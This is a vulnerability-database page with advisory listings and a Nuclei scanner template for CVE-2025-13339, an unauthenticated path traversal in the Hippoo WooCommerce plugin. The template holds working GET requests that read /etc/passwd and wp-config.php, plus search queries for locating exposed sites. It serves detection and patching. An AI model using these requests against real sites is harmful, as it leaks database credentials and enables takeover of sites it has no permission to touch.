| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2025-13339 | 10 Dec 202507:10 | – | circl | |
| WordPress plugin Hippoo Mobile App for WooCommerce 路径遍历漏洞 | 10 Dec 202500:00 | – | cnnvd | |
| CVE-2025-13339 | 10 Dec 202504:24 | – | cve | |
| CVE-2025-13339 Hippoo Mobile App for WooCommerce <= 1.7.1 - Unauthenticated Arbitrary File Read | 10 Dec 202504:24 | – | cvelist | |
| EUVD-2025-202393 | 10 Dec 202504:24 | – | euvd | |
| CVE-2025-13339 | 10 Dec 202505:16 | – | nvd | |
| WordPress Hippoo Mobile App for WooCommerce plugin <= 1.7.1 - Unauthenticated Arbitrary File Read vulnerability | 10 Dec 202506:34 | – | patchstack | |
| PT-2025-50304 | 10 Dec 202500:00 | – | ptsecurity | |
| CVE-2025-13339 | 11 Dec 202505:03 | – | redhatcve | |
| CVE-2025-13339 Hippoo Mobile App for WooCommerce <= 1.7.1 - Unauthenticated Arbitrary File Read | 10 Dec 202504:24 | – | vulnrichment |
id: CVE-2025-13339
info:
name: Hippoo Mobile App for WooCommerce <= 1.7.1 - Unauthenticated Arbitrary File Read
author: pussycat0x
severity: high
description: |
The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to and including 1.7.1 via the template_redirect() function. The plugin registers 'hippoo_serve' as a WordPress query variable and uses it to serve PWA files from the pwa/ directory. In vulnerable versions, the user-supplied value is concatenated directly into a filesystem path without any sanitization or directory confinement check, then passed to readfile(). This allows unauthenticated attackers to read arbitrary files on the server by injecting directory traversal sequences (../).
impact: |
An unauthenticated attacker can read any file readable by the web server process (www-data), including wp-config.php (database credentials, authentication keys and salts), /etc/passwd, server configuration files, and application source code. Exfiltration of wp-config.php alone enables database compromise and WordPress cookie forgery for full site takeover.
remediation: Update the Hippoo Mobile App for WooCommerce plugin to version 1.7.2 or later. The patch adds realpath() canonicalization and a strpos() prefix check to confine file reads to the pwa/ directory.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hippoo/hippoo-mobile-app-for-woocommerce-171-unauthenticated-arbitrary-file-read
- https://plugins.trac.wordpress.org/changeset/3412701/
- https://patchstack.com/database/wordpress/plugin/hippoo/vulnerability/wordpress-hippoo-mobile-app-for-woocommerce-plugin-1-7-1-unauthenticated-arbitrary-file-read-vulnerability
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-13339
cwe-id: CWE-22
epss-score: 0.02056
epss-percentile: 0.7897
metadata:
verified: true
max-request: 2
vendor: hippoo
product: hippoo-mobile-app-for-woocommerce
framework: wordpress
shodan-query: http.component:"WordPress"
fofa-query: body="hippoo"
tags: cve,cve2025,wordpress,wp-plugin,hippoo,lfi,woocommerce
http:
- method: GET
path:
- "{{BaseURL}}/?hippoo_serve=../../../../../../../etc/passwd"
- "{{BaseURL}}/?hippoo_serve=../../../../wp-config.php"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body) || contains_all(body, 'DB_NAME', 'DB_PASSWORD')"
- "status_code == 200"
condition: and
# digest: 4a0a004730450220027bf5160c636ea2776ee01aceafc8a7df9879af25f98a555210628a6ad56bea022100d6d5db9cc4701fe6b4ada18b52e7b0686d869a4e9a2247661c54fc4f6505a5e4:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation